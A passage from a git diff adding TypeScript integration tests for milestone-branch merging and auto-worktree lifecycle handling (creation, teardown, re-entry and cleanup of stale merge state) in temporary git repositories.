+      const result = mergeMilestoneToMain(repo, "M050", roadmap);
+      assert.ok(result.commitMessage.includes("feat:") && result.commitMessage.includes("GSD-Milestone: M050"), "merge commit created despite .gsd conflict");
+    } catch (err) {
+      threw = true;
+    }
+    assert.ok(!threw, "auto-resolves .gsd/ state file conflicts without throwing");
+    assert.ok(existsSync(join(repo, "feature.ts")), "feature.ts merged to main");
+  });
+
+  test("skip checkout when main already current (#757)", () => {
+    const repo = freshRepo();
+    const wtPath = createAutoWorktree(repo, "M060");
+
+    addSliceToMilestone(repo, wtPath, "M060", "S01", "Skip checkout test", [
+      { file: "skip-checkout.ts", content: "export const skip = true;\n", message: "add skip-checkout" },
+    ]);
+
+    const roadmap = makeRoadmap("M060", "Skip checkout verification", [
+      { id: "S01", title: "Skip checkout test" },
+    ]);
+
+    const branchAtRoot = run("git rev-parse --abbrev-ref HEAD", repo);
+    assert.strictEqual(branchAtRoot, "main", "main is already checked out at project root");
+
+    let threw = false;
+    try {
+      const result = mergeMilestoneToMain(repo, "M060", roadmap);
+      assert.ok(result.commitMessage.includes("feat:") && result.commitMessage.includes("GSD-Milestone: M060"), "merge commit created");
+    } catch (err) {
+      threw = true;
+    }
+    assert.ok(!threw, "does not fail when main is already checked out at project root");
+    assert.ok(existsSync(join(repo, "skip-checkout.ts")), "skip-checkout.ts merged to main");
+  });
+
+  test("master-branch repo — no META.json, no prefs (#1668)", () => {
+    const dir = realpathSync(mkdtempSync(join(tmpdir(), "wt-ms-master-test-")));
+    tempDirs.push(dir);
+    run("git init -b master", dir);
+    run("git config user.email test@test.com", dir);
+    run("git config user.name Test", dir);
+    writeFileSync(join(dir, "README.md"), "# master-branch repo\n");
+    mkdirSync(join(dir, ".gsd"), { recursive: true });
+    writeFileSync(join(dir, ".gsd", "STATE.md"), "# State\n");
+    run("git add .", dir);
+    run("git commit -m init", dir);
+    const defaultBranch = run("git rev-parse --abbrev-ref HEAD", dir);
+    assert.strictEqual(defaultBranch, "master", "repo is on master branch");
+
+    const wtPath = createAutoWorktree(dir, "M070");
+    addSliceToMilestone(dir, wtPath, "M070", "S01", "Master branch test", [
+      { file: "master-feature.ts", content: "export const masterFeature = true;\n", message: "add master feature" },
+    ]);
+
+    const metaFile = join(dir, ".gsd", "milestones", "M070", "M070-META.json");
+    assert.ok(!existsSync(metaFile), "no META.json — integration branch not captured");
+
+    const roadmap = makeRoadmap("M070", "Master branch milestone", [
+      { id: "S01", title: "Master branch test" },
+    ]);
+
+    let threw = false;
+    let errMsg = "";
+    try {
+      const result = mergeMilestoneToMain(dir, "M070", roadmap);
+      assert.ok(result.commitMessage.includes("feat:") && result.commitMessage.includes("GSD-Milestone: M070"), "merge commit created on master");
+    } catch (err) {
+      threw = true;
+      errMsg = err instanceof Error ? err.message : String(err);
+    }
+    assert.ok(!threw, `should not throw on master-branch repo (got: ${errMsg})`);
+
+    const finalBranch = run("git rev-parse --abbrev-ref HEAD", dir);
+    assert.strictEqual(finalBranch, "master", "repo is still on master after merge");
+    assert.ok(existsSync(join(dir, "master-feature.ts")), "feature merged to master");
+    const branches = run("git branch", dir);
+    assert.ok(!branches.includes("milestone/M070"), "milestone branch deleted after merge");
+  });
+
+  test("#1738 bug 1: nativeMergeSquash detects dirty working tree", async () => {
+    const { nativeMergeSquash } = await import("../../native-git-bridge.ts");
+    const repo = freshRepo();
+
+    run("git checkout -b milestone/M070", repo);
+    writeFileSync(join(repo, "feature.ts"), "export const feature = true;\n");
+    run("git add .", repo);
+    run('git commit -m "add feature"', repo);
+    run("git checkout main", repo);
+
+    writeFileSync(join(repo, "feature.ts"), "// local dirty version\n");
+
+    const result = nativeMergeSquash(repo, "milestone/M070");
+    assert.strictEqual(result.success, false, "merge reports failure on dirty working tree");
+    assert.ok(
+      result.conflicts.includes("__dirty_working_tree__"),
+      "conflicts include __dirty_working_tree__ sentinel",
+    );
+
+    run("git checkout -- . 2>/dev/null || true", repo);
+    run("rm -f feature.ts", repo);
+  });
+
+  test("#1738 bug 2: branch preserved when squash commit empty", () => {
+    const repo = freshRepo();
+    const wtPath = createAutoWorktree(repo, "M080");
+    const roadmap = makeRoadmap("M080", "Empty milestone", []);
+
+    let threw = false;
+    let errMsg = "";
+    try {
+      mergeMilestoneToMain(repo, "M080", roadmap);
+    } catch (err: unknown) {
+      threw = true;
+      errMsg = err instanceof Error ? err.message : String(err);
+    }
+    assert.ok(!threw, `empty milestone with no code changes should not throw (got: ${errMsg})`);
+  });
+
+  test("#1738 bug 3: synced .gsd/ dirs cleaned before merge", () => {
+    const repo = freshRepo();
+    const wtPath = createAutoWorktree(repo, "M090");
+
+    addSliceToMilestone(repo, wtPath, "M090", "S01", "Sync test", [
+      { file: "sync-test.ts", content: "export const sync = true;\n", message: "add sync-test" },
+    ]);
+
+    const msDir = join(repo, ".gsd", "milestones", "M090", "slices", "S01");
+    mkdirSync(msDir, { recursive: true });
+    writeFileSync(join(msDir, "S01-PLAN.md"), "# synced plan\n");
+    writeFileSync(
+      join(repo, ".gsd", "milestones", "M090", "M090-ROADMAP.md"),
+      "# synced roadmap\n",
+    );
+
+    const runtimeDir = join(repo, ".gsd", "runtime", "units");
+    mkdirSync(runtimeDir, { recursive: true });
+    writeFileSync(join(runtimeDir, "unit-001.json"), '{"stale": true}');
+
+    const roadmap = makeRoadmap("M090", "Sync cleanup test", [
+      { id: "S01", title: "Sync test" },
+    ]);
+
+    let threw = false;
+    try {
+      const result = mergeMilestoneToMain(repo, "M090", roadmap);
+      assert.ok(result.commitMessage.includes("feat:") && result.commitMessage.includes("GSD-Milestone: M090"), "#1738 merge succeeds after cleaning synced dirs");
+    } catch (err: unknown) {
+      threw = true;
+    }
+    assert.ok(!threw, "#1738 merge does not fail on synced .gsd/ files");
+    assert.ok(existsSync(join(repo, "sync-test.ts")), "sync-test.ts on main after merge");
+  });
+
+  test("#1738 e2e: dirty tree is stashed before merge (#2151)", () => {
+    const repo = freshRepo();
+    const wtPath = createAutoWorktree(repo, "M100");
+
+    addSliceToMilestone(repo, wtPath, "M100", "S01", "E2E test", [
+      { file: "e2e.ts", content: "export const e2e = true;\n", message: "add e2e" },
+    ]);
+
+    writeFileSync(join(repo, "e2e.ts"), "// conflicting local file\n");
+
+    const roadmap = makeRoadmap("M100", "E2E dirty tree", [
+      { id: "S01", title: "E2E test" },
+    ]);
+
+    // Since #2151, dirty files are stashed before the squash merge instead
+    // of causing an immediate rejection.  The merge should succeed.
+    let threw = false;
+    try {
+      const result = mergeMilestoneToMain(repo, "M100", roadmap);
+      assert.ok(result.commitMessage.includes("feat:") && result.commitMessage.includes("GSD-Milestone: M100"), "#2151: merge succeeds after stashing dirty files");
+    } catch {
+      threw = true;
+    }
+    assert.ok(!threw, "#2151: dirty tree no longer rejects — stash handles it");
+  });
+
+  test("throw on unanchored code changes after empty commit (#1792)", () => {
+    const repo = freshRepo();
+    const wtPath = createAutoWorktree(repo, "M120");
+
+    addSliceToMilestone(repo, wtPath, "M120", "S01", "Critical feature", [
+      { file: "critical.ts", content: "export const critical = true;\n", message: "add critical feature" },
+    ]);
+
+    run(`git merge milestone/M120 --no-ff -m "merge M120"`, repo);
+    run("git revert HEAD --no-edit -m 1", repo);
+
+    const roadmap = makeRoadmap("M120", "Critical milestone", [
+      { id: "S01", title: "Critical feature" },
+    ]);
+
+    let threw = false;
+    let errMsg = "";
+    try {
+      mergeMilestoneToMain(repo, "M120", roadmap);
+    } catch (err) {
+      threw = true;
+      errMsg = err instanceof Error ? err.message : String(err);
+    }
+    assert.ok(threw, "throws when milestone has unanchored code changes (#1792)");
+    assert.ok(errMsg.includes("code file(s) not on"), "error message mentions unanchored code files (#1792)");
+
+    const branches = run("git branch", repo);
+    assert.ok(branches.includes("milestone/M120"), "milestone branch preserved when code is unanchored (#1792)");
+  });
+
+  test("safe teardown — nothing to commit, work already on main (#1792)", () => {
+    const repo = freshRepo();
+    const wtPath = createAutoWorktree(repo, "M130");
+
+    addSliceToMilestone(repo, wtPath, "M130", "S01", "Already landed", [
+      { file: "landed.ts", content: "export const landed = true;\n", message: "add landed feature" },
+    ]);
+
+    run("git merge --squash milestone/M130", repo);
+    run('git commit -m "pre-land milestone work"', repo);
+
+    const roadmap = makeRoadmap("M130", "Pre-landed milestone", [
+      { id: "S01", title: "Already landed" },
+    ]);
+
+    let threw = false;
+    let errMsg = "";
+    try {
+      mergeMilestoneToMain(repo, "M130", roadmap);
+    } catch (err) {
+      threw = true;
+      errMsg = err instanceof Error ? err.message : String(err);
+    }
+    assert.ok(!threw, `safe nothing-to-commit should not throw (got: ${errMsg})`);
+    assert.ok(existsSync(join(repo, "landed.ts")), "landed.ts present on main");
+  });
+
+  test("stale branch ref — fast-forward before squash merge (#1846)", () => {
+    const repo = freshRepo();
+    const wtPath = createAutoWorktree(repo, "M140");
+
+    addSliceToMilestone(repo, wtPath, "M140", "S01", "Initial work", [
+      { file: "initial.ts", content: "export const initial = true;\n", message: "add initial" },
+    ]);
+
+    const branchRefBefore = run("git rev-parse milestone/M140", wtPath);
+    run("git checkout --detach HEAD", wtPath);
+
+    writeFileSync(join(wtPath, "feature-a.ts"), "export const featureA = true;\n");
+    run("git add .", wtPath);
+    run('git commit -m "add feature-a"', wtPath);
+
+    writeFileSync(join(wtPath, "feature-b.ts"), "export const featureB = true;\n");
+    run("git add .", wtPath);
+    run('git commit -m "add feature-b"', wtPath);
+
+    writeFileSync(join(wtPath, "feature-c.ts"), "export const featureC = true;\n");
+    run("git add .", wtPath);
+    run('git commit -m "add feature-c"', wtPath);
+
+    const branchRefAfter = run("git rev-parse milestone/M140", wtPath);
+    const worktreeHead = run("git rev-parse HEAD", wtPath);
+    assert.strictEqual(branchRefBefore, branchRefAfter, "branch ref unchanged (stale)");
+    assert.ok(worktreeHead !== branchRefAfter, "worktree HEAD ahead of branch ref");
+
+    const roadmap = makeRoadmap("M140", "Stale ref milestone", [
+      { id: "S01", title: "Initial work" },
+    ]);
+
+    let threw = false;
+    let errMsg = "";
+    try {
+      const result = mergeMilestoneToMain(repo, "M140", roadmap);
+      assert.ok(result.commitMessage.includes("feat:") && result.commitMessage.includes("GSD-Milestone: M140"), "merge commit created");
+    } catch (err) {
+      threw = true;
+      errMsg = err instanceof Error ? err.message : String(err);
+    }
+    assert.ok(!threw, `should not throw with stale branch ref (got: ${errMsg})`);
+
+    assert.ok(existsSync(join(repo, "initial.ts")), "initial.ts on main");
+    assert.ok(existsSync(join(repo, "feature-a.ts")), "feature-a.ts on main (#1846)");
+    assert.ok(existsSync(join(repo, "feature-b.ts")), "feature-b.ts on main (#1846)");
+    assert.ok(existsSync(join(repo, "feature-c.ts")), "feature-c.ts on main (#1846)");
+  });
+
+  test("diverged worktree HEAD — throws on divergence (#1846)", () => {
+    const repo = freshRepo();
+    const wtPath = createAutoWorktree(repo, "M150");
+
+    addSliceToMilestone(repo, wtPath, "M150", "S01", "Base work", [
+      { file: "base.ts", content: "export const base = true;\n", message: "add base" },
+    ]);
+
+    run("git checkout --detach HEAD", wtPath);
+    writeFileSync(join(wtPath, "detached-work.ts"), "export const detached = true;\n");
+    run("git add .", wtPath);
+    run('git commit -m "detached work"', wtPath);
+
+    run("git checkout milestone/M150", repo);
+    writeFileSync(join(repo, "diverged-work.ts"), "export const diverged = true;\n");
+    run("git add .", repo);
+    run('git commit -m "diverged work on branch"', repo);
+    run("git checkout main", repo);
+
+    process.chdir(wtPath);
+
+    const roadmap = makeRoadmap("M150", "Diverged milestone", [
+      { id: "S01", title: "Base work" },
+    ]);
+
+    let threw = false;
+    let errMsg = "";
+    try {
+      mergeMilestoneToMain(repo, "M150", roadmap);
+    } catch (err) {
+      threw = true;
+      errMsg = err instanceof Error ? err.message : String(err);
+    }
+    assert.ok(threw, "throws when worktree HEAD diverged from branch ref (#1846)");
+    assert.ok(errMsg.includes("diverged"), "error message mentions divergence (#1846)");
+
+    const branches = run("git branch", repo);
+    assert.ok(branches.includes("milestone/M150"), "milestone branch preserved on divergence (#1846)");
+  });
+
+  test("#1853 bug 1: SQUASH_MSG cleaned up after successful squash-merge", () => {
+    const repo = freshRepo();
+    const wtPath = createAutoWorktree(repo, "M160");
+
+    addSliceToMilestone(repo, wtPath, "M160", "S01", "SQUASH_MSG cleanup test", [
+      { file: "squash-cleanup.ts", content: "export const cleanup = true;\n", message: "add squash-cleanup" },
+    ]);
+
+    const roadmap = makeRoadmap("M160", "SQUASH_MSG cleanup", [
+      { id: "S01", title: "SQUASH_MSG cleanup test" },
+    ]);
+
+    const squashMsgPath = join(repo, ".git", "SQUASH_MSG");
+    writeFileSync(squashMsgPath, "leftover squash message\n");
+    assert.ok(existsSync(squashMsgPath), "SQUASH_MSG planted before merge");
+
+    const result = mergeMilestoneToMain(repo, "M160", roadmap);
+    assert.ok(result.commitMessage.includes("feat:") && result.commitMessage.includes("GSD-Milestone: M160"), "merge commit created");
+
+    assert.ok(!existsSync(squashMsgPath), "#1853: SQUASH_MSG must not persist after successful squash-merge");
+  });
+
+  test("#1853 bug 2: uncommitted worktree changes committed before teardown", () => {
+    const repo = freshRepo();
+    const wtPath = createAutoWorktree(repo, "M170");
+
+    addSliceToMilestone(repo, wtPath, "M170", "S01", "Teardown safety test", [
+      { file: "safe-file.ts", content: "export const safe = true;\n", message: "add safe file" },
+    ]);
+
+    writeFileSync(join(wtPath, "uncommitted-agent-code.ts"), "export const lost = true;\n");
+
+    const roadmap = makeRoadmap("M170", "Teardown safety", [
+      { id: "S01", title: "Teardown safety test" },
+    ]);
+
+    const result = mergeMilestoneToMain(repo, "M170", roadmap);
+    assert.ok(result.commitMessage.includes("feat:") && result.commitMessage.includes("GSD-Milestone: M170"), "merge commit created");
+
+    assert.ok(
+      existsSync(join(repo, "uncommitted-agent-code.ts")),
+      "#1853: uncommitted worktree code must survive teardown",
+    );
+  });
+
+  test("#1906: codeFilesChanged=false when only .gsd/ metadata merged", () => {
+    const repo = freshRepo();
+    const wtPath = createAutoWorktree(repo, "M180");
+
+    mkdirSync(join(wtPath, ".gsd", "milestones", "M180"), { recursive: true });
+    writeFileSync(
+      join(wtPath, ".gsd", "milestones", "M180", "SUMMARY.md"),
+      "# M180 Summary\n\nThis milestone was planned but not implemented.\n",
+    );
+    run("git add .", wtPath);
+    run('git commit -m "chore: add milestone summary"', wtPath);
+
+    const roadmap = makeRoadmap("M180", "Metadata-only milestone", []);
+
+    const result = mergeMilestoneToMain(repo, "M180", roadmap);
+    assert.strictEqual(result.codeFilesChanged, false,
+      "#1906: codeFilesChanged must be false when only .gsd/ files were merged");
+  });
+
+  test("#2912: MERGE_HEAD cleaned up after squash-merge conflict", () => {
+    const repo = freshRepo();
+    const wtPath = createAutoWorktree(repo, "M291");
+
+    // Create a file on main that will conflict with the milestone branch
+    run("git checkout main", repo);
+    writeFileSync(join(repo, "conflict.ts"), "// main version\nexport const x = 1;\n");
+    run("git add .", repo);
+    run("git commit -m 'add conflict.ts on main'", repo);
+
+    // Switch back to milestone branch and create conflicting content
+    run("git checkout milestone/M291", wtPath);
+    writeFileSync(join(wtPath, "conflict.ts"), "// milestone version\nexport const x = 2;\n");
+    run("git add .", wtPath);
+    run("git commit -m 'add conflict.ts on milestone'", wtPath);
+
+    const roadmap = makeRoadmap("M291", "Conflict milestone", [
+      { id: "S01", title: "Conflict test" },
+    ]);
+
+    // The merge should throw MergeConflictError due to conflict.ts
+    let threw = false;
+    try {
+      mergeMilestoneToMain(repo, "M291", roadmap);
+    } catch (err: unknown) {
+      threw = true;
+      // Verify it's a merge conflict error
+      assert.ok(
+        err instanceof Error && err.message.includes("conflict"),
+        "should throw a conflict-related error",
+      );
+    }
+    assert.ok(threw, "mergeMilestoneToMain must throw on code conflict");
+
+    // BUG #2912: MERGE_HEAD must NOT be left on disk after the error
+    const mergeHeadPath = join(repo, ".git", "MERGE_HEAD");
+    assert.ok(
+      !existsSync(mergeHeadPath),
+      "#2912: MERGE_HEAD must be cleaned up after merge conflict error",
+    );
+  });
+
+  test("#2912: stale MERGE_HEAD from native merge is cleaned after successful commit", () => {
+    const repo = freshRepo();
+    const wtPath = createAutoWorktree(repo, "M292");
+
+    addSliceToMilestone(repo, wtPath, "M292", "S01", "Feature A", [
+      { file: "feature-a.ts", content: "export const a = true;\n", message: "add feature a" },
+    ]);
+
+    const roadmap = makeRoadmap("M292", "Clean merge", [
+      { id: "S01", title: "Feature A" },
+    ]);
+
+    // Simulate what libgit2's merge implementation does: it creates MERGE_HEAD
+    // even for squash merges (unlike CLI git). We plant MERGE_HEAD before calling
+    // mergeMilestoneToMain to verify the success path cleans it up.
+    // We cannot plant it before the call because the function manages checkout
+    // internally, so instead we verify after the call.
+    mergeMilestoneToMain(repo, "M292", roadmap);
+
+    // After successful merge+commit, MERGE_HEAD must not linger
+    const mergeHeadPath = join(repo, ".git", "MERGE_HEAD");
+    assert.ok(
+      !existsSync(mergeHeadPath),
+      "#2912: MERGE_HEAD must be cleaned up after successful merge",
+    );
+  });
+
+  test("#2912: planted MERGE_HEAD is cleaned up in success path", () => {
+    // This test directly verifies the cleanup code handles a MERGE_HEAD file
+    // left by the native (libgit2) merge path. We hook into the merge by
+    // planting MERGE_HEAD right after nativeMergeSquash would create it.
+    const repo = freshRepo();
+    const wtPath = createAutoWorktree(repo, "M293");
+
+    addSliceToMilestone(repo, wtPath, "M293", "S01", "Feature B", [
+      { file: "feature-b.ts", content: "export const b = true;\n", message: "add feature b" },
+    ]);
+
+    const roadmap = makeRoadmap("M293", "Planted MERGE_HEAD", [
+      { id: "S01", title: "Feature B" },
+    ]);
+
+    // Plant a fake MERGE_HEAD in the git dir to simulate libgit2 behavior.
+    // We need to do this after the function checks out main but before it
+    // commits. Since we can't intercept mid-function, we plant it before
+    // the call. If the function cleans it up, the test passes.
+    const gitDir = join(repo, ".git");
+    const fakeHead = run("git rev-parse HEAD", repo);
+    writeFileSync(join(gitDir, "MERGE_HEAD"), fakeHead + "\n");
+
+    mergeMilestoneToMain(repo, "M293", roadmap);
+
+    // The planted MERGE_HEAD must be cleaned up
+    assert.ok(
+      !existsSync(join(gitDir, "MERGE_HEAD")),
+      "#2912: planted MERGE_HEAD must be removed by success-path cleanup",
+    );
+  });
+
+  test("#2912: stale SQUASH_MSG and MERGE_MSG are cleaned before squash merge", () => {
+    // Verifies that the pre-merge cleanup (step 7b) removes all three merge
+    // artifacts — not just MERGE_HEAD — so that `git merge --squash` never
+    // encounters leftover state from a prior interrupted operation.
+    const repo = freshRepo();
+    const wtPath = createAutoWorktree(repo, "M294");
+
+    addSliceToMilestone(repo, wtPath, "M294", "S01", "Feature C", [
+      { file: "feature-c.ts", content: "export const c = true;\n", message: "add feature c" },
+    ]);
+
+    const roadmap = makeRoadmap("M294", "Stale merge artifacts", [
+      { id: "S01", title: "Feature C" },
+    ]);
+
+    // Plant stale merge artifacts in the git dir to simulate a prior
+    // interrupted merge.  The pre-merge cleanup must remove all of them.
+    const gitDir = join(repo, ".git");
+    writeFileSync(join(gitDir, "SQUASH_MSG"), "stale squash message\n");
+    writeFileSync(join(gitDir, "MERGE_MSG"), "stale merge message\n");
+
+    mergeMilestoneToMain(repo, "M294", roadmap);
+
+    assert.ok(
+      !existsSync(join(gitDir, "SQUASH_MSG")),
+      "#2912: stale SQUASH_MSG must be removed by pre-merge cleanup",
+    );
+    assert.ok(
+      !existsSync(join(gitDir, "MERGE_MSG")),
+      "#2912: stale MERGE_MSG must be removed by pre-merge cleanup",
+    );
+  });
+
+  test("#1906: codeFilesChanged=true when real code is merged", () => {
+    const repo = freshRepo();
+    const wtPath = createAutoWorktree(repo, "M190");
+
+    addSliceToMilestone(repo, wtPath, "M190", "S01", "Real code", [
+      { file: "real-code.ts", content: "export const real = true;\n", message: "add real code" },
+    ]);
+
+    const roadmap = makeRoadmap("M190", "Code milestone", [
+      { id: "S01", title: "Real code" },
+    ]);
+
+    const result = mergeMilestoneToMain(repo, "M190", roadmap);
+    assert.strictEqual(result.codeFilesChanged, true,
+      "#1906: codeFilesChanged must be true when real code files were merged");
+    assert.ok(existsSync(join(repo, "real-code.ts")), "real-code.ts merged to main");
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/integration/auto-worktree.test.ts b/src/resources/extensions/gsd/tests/integration/auto-worktree.test.ts
new file mode 100644
index 000000000..500fe6329
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/integration/auto-worktree.test.ts
@@ -0,0 +1,348 @@
+/**
+ * auto-worktree.test.ts — Tests for auto-worktree lifecycle.
+ *
+ * Covers: create → detect → teardown, re-entry, path helpers.
+ * Runs in a real temp git repo.
+ */
+
+import { describe, test, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import { mkdtempSync, mkdirSync, writeFileSync, rmSync, existsSync, realpathSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+import { execSync } from "node:child_process";
+
+import {
+  createAutoWorktree,
+  teardownAutoWorktree,
+  isInAutoWorktree,
+  getAutoWorktreePath,
+  enterAutoWorktree,
+  getAutoWorktreeOriginalBase,
+  getActiveAutoWorktreeContext,
+  syncGsdStateToWorktree,
+} from "../../auto-worktree.ts";
+
+// Note: execSync is used intentionally in tests for git operations with
+// controlled, hardcoded inputs (no user input). This is safe and matches
+// the pattern used by the original test file.
+function run(command: string, cwd: string): string {
+  return execSync(command, { cwd, stdio: ["ignore", "pipe", "pipe"], encoding: "utf-8" }).trim();
+}
+
+function createTempRepo(): string {
+  const dir = realpathSync(mkdtempSync(join(tmpdir(), "auto-wt-test-")));
+  run("git init", dir);
+  run("git config user.email test@test.com", dir);
+  run("git config user.name Test", dir);
+  // Create initial commit on main
+  writeFileSync(join(dir, "README.md"), "# test\n");
+  run("git add .", dir);
+  run("git commit -m init", dir);
+  // Ensure branch is called main
+  run("git branch -M main", dir);
+  return dir;
+}
+
+describe("auto-worktree lifecycle", () => {
+  const savedCwd = process.cwd();
+  let tempDir = "";
+
+  afterEach(() => {
+    process.chdir(savedCwd);
+    if (tempDir && existsSync(tempDir)) {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+    tempDir = "";
+  });
+
+  test("create → detect → teardown", () => {
+    tempDir = createTempRepo();
+
+    // Create .gsd/milestones/M003 with a dummy file (simulates planning artifacts)
+    const msDir = join(tempDir, ".gsd", "milestones", "M003");
+    mkdirSync(msDir, { recursive: true });
+    writeFileSync(join(msDir, "CONTEXT.md"), "# M003 Context\n");
+    run("git add .", tempDir);
+    run("git commit -m \"add milestone\"", tempDir);
+
+    // ─── createAutoWorktree ──────────────────────────────────────────
+    const wtPath = createAutoWorktree(tempDir, "M003");
+
+    assert.ok(existsSync(wtPath), "worktree directory exists after create");
+    assert.strictEqual(process.cwd(), wtPath, "process.cwd() is worktree path after create");
+
+    const branch = run("git branch --show-current", wtPath);
+    assert.strictEqual(branch, "milestone/M003", "git branch is milestone/M003");
+
+    assert.ok(
+      existsSync(join(wtPath, ".gsd", "milestones", "M003", "CONTEXT.md")),
+      "planning files inherited in worktree",
+    );
+
+    // ─── isInAutoWorktree ────────────────────────────────────────────
+    assert.ok(isInAutoWorktree(tempDir), "isInAutoWorktree returns true when inside");
+
+    // ─── getAutoWorktreeOriginalBase ─────────────────────────────────
+    assert.strictEqual(getAutoWorktreeOriginalBase(), tempDir, "originalBase returns temp dir");
+    assert.deepStrictEqual(
+      getActiveAutoWorktreeContext(),
+      {
+        originalBase: tempDir,
+        worktreeName: "M003",
+        branch: "milestone/M003",
+      },
+      "active auto-worktree context reflects the worktree cwd",
+    );
+
+    // ─── getAutoWorktreePath ─────────────────────────────────────────
+    assert.strictEqual(getAutoWorktreePath(tempDir, "M003"), wtPath, "getAutoWorktreePath returns correct path");
+    assert.strictEqual(getAutoWorktreePath(tempDir, "M999"), null, "getAutoWorktreePath returns null for nonexistent");
+
+    // ─── teardownAutoWorktree ────────────────────────────────────────
+    teardownAutoWorktree(tempDir, "M003");
+
+    assert.strictEqual(process.cwd(), tempDir, "process.cwd() back to original after teardown");
+    assert.ok(!existsSync(wtPath), "worktree directory removed after teardown");
+    assert.ok(!isInAutoWorktree(tempDir), "isInAutoWorktree returns false after teardown");
+    assert.strictEqual(getAutoWorktreeOriginalBase(), null, "originalBase is null after teardown");
+    assert.strictEqual(getActiveAutoWorktreeContext(), null, "active auto-worktree context clears after teardown");
+  });
+
+  test("re-entry: create again, exit without teardown, re-enter", () => {
+    tempDir = createTempRepo();
+    const msDir = join(tempDir, ".gsd", "milestones", "M003");
+    mkdirSync(msDir, { recursive: true });
+    writeFileSync(join(msDir, "CONTEXT.md"), "# M003 Context\n");
+    run("git add .", tempDir);
+    run("git commit -m \"add milestone\"", tempDir);
+
+    const wtPath2 = createAutoWorktree(tempDir, "M003");
+    assert.ok(existsSync(wtPath2), "worktree re-created");
+
+    // Manually chdir out (simulates pause/crash)
+    process.chdir(tempDir);
+
+    // enterAutoWorktree should re-enter
+    const entered = enterAutoWorktree(tempDir, "M003");
+    assert.strictEqual(process.cwd(), entered, "re-entered worktree via enterAutoWorktree");
+    assert.strictEqual(getAutoWorktreeOriginalBase(), tempDir, "originalBase restored on re-entry");
+    assert.ok(isInAutoWorktree(tempDir), "isInAutoWorktree true after re-entry");
+    assert.deepStrictEqual(
+      getActiveAutoWorktreeContext(),
+      {
+        originalBase: tempDir,
+        worktreeName: "M003",
+        branch: "milestone/M003",
+      },
+      "active auto-worktree context is restored on re-entry",
+    );
+
+    // Cleanup
+    teardownAutoWorktree(tempDir, "M003");
+  });
+
+  test("coexistence with manual worktree", async () => {
+    tempDir = createTempRepo();
+    const msDir = join(tempDir, ".gsd", "milestones", "M003");
+    mkdirSync(msDir, { recursive: true });
+    writeFileSync(join(msDir, "CONTEXT.md"), "# M003 Context\n");
+    run("git add .", tempDir);
+    run("git commit -m \"add milestone\"", tempDir);
+
+    // Import createWorktree directly for manual worktree
+    const { createWorktree } = await import("../../worktree-manager.ts");
+
+    // Create manual worktree (uses worktree/<name> branch)
+    const manualWt = createWorktree(tempDir, "feature-x");
+    assert.ok(existsSync(manualWt.path), "manual worktree exists");
+    assert.strictEqual(manualWt.branch, "worktree/feature-x", "manual worktree uses worktree/ prefix");
+
+    // Create auto-worktree alongside
+    const autoWtPath = createAutoWorktree(tempDir, "M003");
+    assert.ok(existsSync(autoWtPath), "auto-worktree coexists with manual");
+    assert.ok(existsSync(manualWt.path), "manual worktree still exists");
+
+    // Cleanup both
+    teardownAutoWorktree(tempDir, "M003");
+    const { removeWorktree } = await import("../../worktree-manager.ts");
+    removeWorktree(tempDir, "feature-x");
+  });
+
+  test("split-brain prevention: originalBase cleared after teardown", () => {
+    tempDir = createTempRepo();
+    const msDir = join(tempDir, ".gsd", "milestones", "M003");
+    mkdirSync(msDir, { recursive: true });
+    writeFileSync(join(msDir, "CONTEXT.md"), "# M003 Context\n");
+    run("git add .", tempDir);
+    run("git commit -m \"add milestone\"", tempDir);
+
+    createAutoWorktree(tempDir, "M003");
+    teardownAutoWorktree(tempDir, "M003");
+
+    assert.strictEqual(getAutoWorktreeOriginalBase(), null, "no split-brain: originalBase cleared");
+  });
+
+  test("#1526: getMainBranch returns milestone/<MID> in auto-worktree", async () => {
+    tempDir = createTempRepo();
+    const msDir = join(tempDir, ".gsd", "milestones", "M005");
+    mkdirSync(msDir, { recursive: true });
+    writeFileSync(join(msDir, "CONTEXT.md"), "# M005 Context\n");
+    run("git add .", tempDir);
+    run("git commit -m \"add milestone\"", tempDir);
+
+    const { GitServiceImpl } = await import("../../git-service.ts");
+
+    // Create worktree
+    const wtPath = createAutoWorktree(tempDir, "M005");
+    // Don't set main_branch pref so getMainBranch falls through to worktree detection
+    const gitService = new GitServiceImpl(wtPath);
+    gitService.setMilestoneId("M005");
+
+    // Verify getMainBranch returns the milestone branch
+    const mainBranch = gitService.getMainBranch();
+    assert.strictEqual(mainBranch, "milestone/M005", "getMainBranch returns milestone/<MID> in auto-worktree");
+
+    // Cleanup
+    teardownAutoWorktree(tempDir, "M005");
+  });
+
+  test("#1713: stale worktree directory without .git file", async () => {
+    tempDir = createTempRepo();
+    const msDir = join(tempDir, ".gsd", "milestones", "M010");
+    mkdirSync(msDir, { recursive: true });
+    writeFileSync(join(msDir, "CONTEXT.md"), "# M010 Context\n");
+    run("git add .", tempDir);
+    run("git commit -m \"add milestone\"", tempDir);
+
+    // Simulate a crash leaving a stale directory with no .git file.
+    const { worktreePath } = await import("../../worktree-manager.ts");
+    const staleDir = worktreePath(tempDir, "M010");
+    mkdirSync(staleDir, { recursive: true });
+    writeFileSync(join(staleDir, "orphan.txt"), "stale leftover\n");
+    assert.ok(existsSync(staleDir), "stale directory exists before recovery");
+    assert.ok(!existsSync(join(staleDir, ".git")), "stale directory has no .git file");
+
+    // createAutoWorktree should remove the stale dir and create a real worktree
+    const recoveredPath = createAutoWorktree(tempDir, "M010");
+    assert.ok(existsSync(recoveredPath), "worktree created after stale dir recovery");
+    assert.ok(existsSync(join(recoveredPath, ".git")), "recovered worktree has .git file");
+    assert.ok(!existsSync(join(recoveredPath, "orphan.txt")), "stale file removed by recovery");
+
+    teardownAutoWorktree(tempDir, "M010");
+  });
+
+  test("#778: reconcile plan checkboxes on re-attach", async () => {
+    tempDir = createTempRepo();
+    const msDir = join(tempDir, ".gsd", "milestones", "M003");
+    mkdirSync(msDir, { recursive: true });
+    writeFileSync(join(msDir, "CONTEXT.md"), "# M003 Context\n");
+    run("git add .", tempDir);
+    run("git commit -m \"add milestone\"", tempDir);
+
+    const planRelPath = join(".gsd", "milestones", "M004", "slices", "S01", "S01-PLAN.md");
+    const planDir = join(tempDir, ".gsd", "milestones", "M004", "slices", "S01");
+    const { mkdirSync: mkdir, writeFileSync: write, readFileSync: read } = await import("node:fs");
+
